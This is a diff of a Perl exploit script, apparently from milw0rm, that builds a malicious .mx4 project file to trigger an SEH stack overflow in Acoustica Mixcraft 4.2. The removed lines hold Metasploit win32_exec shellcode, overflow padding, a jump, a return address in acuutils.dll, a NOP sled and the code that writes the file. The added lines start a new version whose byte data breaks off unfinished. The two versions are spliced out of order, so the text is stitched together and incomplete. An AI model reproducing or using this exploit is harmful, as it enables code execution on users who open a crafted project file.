-		"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-		"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-		"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-		"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xFF\xFF\x80\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x5E\x40\x03\x00\x00\x00\x04\x00\x00\x00\x04\x00".
-	        "\x00\x00\x01\x01\x01\x00\x00\x00\x00\x00\x00\x00\xF0\x3F\x54\x72\x6B\x4D\xA0\x07\x00\x00\x9A\x99\x99\x99\x99\x99\xF1\x3F\x00\x00".
-	        "\x00\x00\x49\x6E\x73\x74\x72\x75\x6D\x65\x6E\x74\x20\x54\x72\x61\x63\x6B\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00";
-my $mx4_data2 = "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\xF0\x3F\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xFF\x00\x01\x00\x00\x00\x46\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x5F\x73\x79\x6E\x74\x68\x2E\x70\x6E\x67\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xFF\xFF\xFF\xFF\xFF\xFF".
-	        "\xFF\xFF\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xFF\xFF\xFF\xFF\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x4C\x49\x53\x54\x04\x00\x00\x00\x45\x66\x78\x4C\x4C\x49\x53\x54\xDC\x00\x00\x00\x45\x69".
-	        "\x73\x4C\x45\x66\x78\x44\xD0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x40\x4D\x47\x63\x41\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x01\x00\x00\x00\x44\x58\x46\x58\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\xF0\x3F\x00\x00\x00\x00\x00\x00\x00\x00\x00\x7F\x00\x7F\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x4C\x49\x53\x54\x04\x00".
-	        "\x00\x00\x45\x69\x66\x78";
-
-# win32_exec -  EXITFUNC=thread CMD=calc Size=160 Encoder=PexFnstenvSub http://metasploit.com
-my $shellcode =
-"\x29\xc9\x83\xe9\xde\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x53".
-"\x9f\x26\xea\x83\xeb\xfc\xe2\xf4\xaf\x77\x62\xea\x53\x9f\xad\xaf".
-"\x6f\x14\x5a\xef\x2b\x9e\xc9\x61\x1c\x87\xad\xb5\x73\x9e\xcd\xa3".
-"\xd8\xab\xad\xeb\xbd\xae\xe6\x73\xff\x1b\xe6\x9e\x54\x5e\xec\xe7".
-"\x52\x5d\xcd\x1e\x68\xcb\x02\xee\x26\x7a\xad\xb5\x77\x9e\xcd\x8c".
-"\xd8\x93\x6d\x61\x0c\x83\x27\x01\xd8\x83\xad\xeb\xb8\x16\x7a\xce".
-"\x57\x5c\x17\x2a\x37\x14\x66\xda\xd6\x5f\x5e\xe6\xd8\xdf\x2a\x61".
-"\x23\x83\x8b\x61\x3b\x97\xcd\xe3\xd8\x1f\x96\xea\x53\x9f\xad\x82".
-"\x6f\xc0\x17\x1c\x33\xc9\xaf\x12\xd0\x5f\x5d\xba\x3b\x70\xe8\x0a".
-"\x33\xf7\xbe\x14\xd9\x91\x71\x15\xb4\xfc\x47\x86\x30\x9f\x26\xea";
-
-my $overflow1 = "\x41" x 316;
-my $overflow2 = "\x41" x 1024;
-my $short_jmp = "\xeb\x06\xff\xff";
-my $ret = "\xf9\x2b\x03\x10"; #universal return address = 0x10032bf9 acuutils.dll
-my $nop_sled = "\x90" x 24;
-
-open(my $mx4_file, "> s.mx4");
-binmode $mx4_file;
-print $mx4_file $mx4_data1.
-		$overflow1.$short_jmp.$ret.$nop_sled.$shellcode.$overflow2.
-                $mx4_data2;
-close($mx4_file);
-
-# milw0rm.com [2008-12-24]
+#!/usr/bin/perl
+#
+# Acoustica Mixcraft <= 4.2 Universal Stack Overflow Exploit (SEH)
+# ------------------------------------------------------
+# Found/Exploit by SkD (skdrat@hotmail.com)
+#
+# MixCraft Download = http://www.acoustica.com/mixcraft/download.htm
+#
+# A local exploit for the .mx4 project file affecting MixCraft 4.2 (other versions
+# may also work). I knew of this vulnerability since MixCraft 3, so
+# it's time to release a fresh exploit to the public for the latest ver of this
+# software.
+# This exploit also implements the SEH technique to exploit the issue and it
+# works on all Windows versions.
+#
+# Enjoy.
+#
+# Note: Author has no resposibility over the damage you do with this!
+
+use strict;
+use warnings;
+my $mx4_data1 = "\x52\x49\x46\x46\xBC\x14\x00\x00\x4D\x58\x43\x33\x50\x52\x4F\x4A\x60\x0A\x00\x00\xCD\xCC\xCC\xCC\xCC\xCC\xF4\x3F\x41\x41\x41\x41".
+		"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
+		"\x41\x41\x41\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+		"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+		"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+		"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+		"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+		"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+		"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+		"\x00\x01".("\x00" x 2320).
+                "\xF0\x3F\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+		"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+		"\x00\x00\x4C\x49\x53\x54\x04\x00\x00\x00\x45\x66\x78\x4C\x4D\x61\x72\x6B\x98\x01\x00\x00\x00\x00\x00\x00\x00\x00\xF0\x3F\x01\x00".
+		"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+		"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+		"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x53\x74\x61\x72\x74\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+		"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+		"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+		"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+		"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+		"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+		"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xFF\xFF\x80\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x5E\x40\x03\x00\x00\x00\x04\x00\x00\x00\x04\x00".
+	        "\x00\x00\x01\x01\x01\x00\x00\x00\x00\x00\x00\x00\xF0\x3F\x54\x72\x6B\x4D\xA0\x07\x00\x00\x9A\x99\x99\x99\x99\x99\xF1\x3F\x00\x00".
+	        "\x00\x00\x49\x6E\x73\x74\x72\x75\x6D\x65\x6E\x74\x20\x54\x72\x61\x63\x6B\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00";
+my $mx4_data2 = "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\xF0\x3F\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xFF\x00\x01\x00\x00\x00\x46\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+	        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
